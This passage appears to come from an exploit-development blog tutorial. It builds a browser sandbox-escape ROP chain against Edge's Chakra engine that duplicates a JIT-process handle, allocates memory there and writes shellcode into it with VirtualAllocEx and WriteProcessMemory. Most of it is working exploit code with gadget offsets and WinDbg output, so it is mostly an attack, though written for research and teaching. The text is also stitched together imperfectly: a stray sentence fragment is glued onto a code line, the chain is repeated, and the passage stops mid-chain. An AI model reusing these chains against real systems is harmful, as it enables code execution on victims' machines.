write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();is in its final state
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Our ROP chain starts with the following gadget:

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();

This gadget is also used four times before our first gadget within the WriteProcessMemory ROP chain. So, we will re-execute our updated exploit and set a breakpoint on this gadget and hit g in WinDbg five times in order to get to our intended first gadget (four times to “bypass” the other uses, and once more to get to our intended gadget).

Our first ROP sequence in our case is not going to actually involve WriteProcessMemory. Instead, we are going to store our VirtualAllocEx allocation (which should still be in RAX, as our previous ROP chain called VirtualAllocEx, which places the address of the allocation in RAX) in a “permanent” location within the .data section of kernelbase.dll. Think of this as we are storing the allocation returned from VirtualAllocEx in a “global variable” (of sorts):

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

At this point we have achieved persistent storage of where we would like to allocate our shellcode (the value returned from VirtualAllocEx). We will be using RAX in our ROP chain for WriteProcessMemory, so in this case we persistently store it so we do not “clobber” this value with our ROP chain. Having said that, our first item on the WriteProcessMemory docket is to place the size of our write operation (~ sizeof(shellcode), of 0x1000 bytes) into R9 as the nSize argument.

We start this process, of which there are many examples in this blog post, by placing a writable address in RAX which we do not care about, to grant us access to the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret gadget. This allows us to place our intended value of 0x1000 into R9.

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	-
	-
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

Next up in our ROP sequence is the hProcess parameter, also known as our PROCESS_ALL_ACCESS handle to the JIT server. We can simply just fetch this from the .data section of chakra.dll, where we stored this value as a result of our DuplicateHandle call.

You’ll notice there is a mov [rax+0x20], rcx write operation that will write the contents of RCX into the memory address, at an offset of 0x20, in RAX. You’ll recall we “prepped” RAX already in this ROP sequence when dealing with the nSize parameter - meaning RAX already has a writable address, and the write operation will not cause an access violation (e.g. writing to a non-writable address).

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	-
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

The next parameter we are going to deal with is lpBaseAddress. In our call to WriteProcessMemory, this is the address within the process denoted by the handle supplied in hProcess (the JIT server process where ACG is disabled). We control a region of one memory page within the JIT process, as a result of our VirtualAllocEx ROP chain. This allocation (which resides in the JIT process) is the address we are going to supply here.

This ROP sequence is slightly convoluted, so I will provide the snippet (which is already above) directly below for continuity/context:

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

We can simply pop the address where we stored the address of our JIT process allocation (via VirtualAllocEx) into the RDX register. However, this is where things get “interesting”. There were no good gadgets within chakra.dll to directly dereference RDX and place it into RDX (mov rdx, [rdx] ; ret). The only gadget to do so, as we see above, is mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret. We can see we are able to dereference RDX and store it in RDX, but not via RDX directly instead, we have the ability to take whatever memory address is stored in RDX, at an offset of 0x8, and place this into RDX. So, we do a bit of math here. If we pop our jit_allocation-0x8 into RDX, when the mov rdx, [rdx+0x8] occurs, it will take the value in RDX, add 8 to it, and dereference the contents - storing them in RDX. Since -0x8 + +0x8 = 0, we simply “offset” the difference as a “hack”, of sorts, to ensure RDX contains the base address of our allocation.

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

Now, our next item is to knock out the lpBuffer parameter. This is the easiest of our parameters, as we have already stored the shellcode we want to copy into the remote JIT process in the .data section of chakra.dll (see “Shellcode” section of this blog post).

Our call is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode)				// Size of our shellcode
	NULL 						// Optional
);

The last items on the agenda are to load kernelbase!WriteProcessMemory into RAX and jmp to it, and also write our last parameter to the stack at RSP + 0x28 (NULL/0 value).

Now, before we hit the jmp rax instruction to jump into our call to WriteProcessMemory, let’s attach another WinDbg debugger to the JIT process and examine the lpBaseAddress parameter.

We can see our allocation is valid, but is not set to any value. Let’s hit t in the content process WinDbg session and then pt to execute the call to WriteProcessMemory, but pausing before we return from the function call.

Now, let’s go back to the JIT process WinDbg session and re-examine the contents of the allocation.

As we can see, we have our shellcode mapped into the JIT process. All there is left now (which is a slight misnomer, as it is several more chained ROP chains) is to force the JIT process to mark this code as RWX, and execute it.

CreateRemoteThread ROP Chain

We now have a remote allocation within the JIT process, where we have written our shellcode to. As mentioned, we now need a way to execute this shellcode. As you may, or may not know, on Windows threads are what are responsible for executing code (not a process itself, which can be though of as a “container of resources”). What we are going to do now is create a thread within the JIT process, but we are going to create this thread in a suspended manner. As we know, our shellcode is sitting in readable and writable page. We first need to mark this page as RWX, which we will do in the later portions of this blog. So, for now, we will create the thread which will be responsible for executing our shellcode in the future - but we are going to create it in a suspended state and reconcile execution later. CreateRemoteThread is an API, exported by the Windows API, which allows a user to create a thread in a remote process. This will allow us to create a thread within the JIT process, from our current content process. Here is how our call will be setup:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)
);

This call requires mostly everything to be set to NULL or 0, with the exception of two parameters. We are creating our thread in a suspended state to ensure execution doesn’t occur until we explicitly resume the thread. This is because we still need to overwrite the RSP register of this thread with our final-stage ROP chain, before the ret occurs. Since we are setting the lpStartAddress parameter to the address of a ROP gadget, this effectively is the entry point for this newly-created thread and it should be the function called. Since it is a ROP gadget that performs ret, execution should just return to the stack. So, when we eventually resume this thread, our thread (which is executing in he remote JIT process, where ACG is disabled), will return to whatever is located on the stack. We will eventually update RSP to point to.

Here is how this looks in ROP form (with all previous ROP chains added for context):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
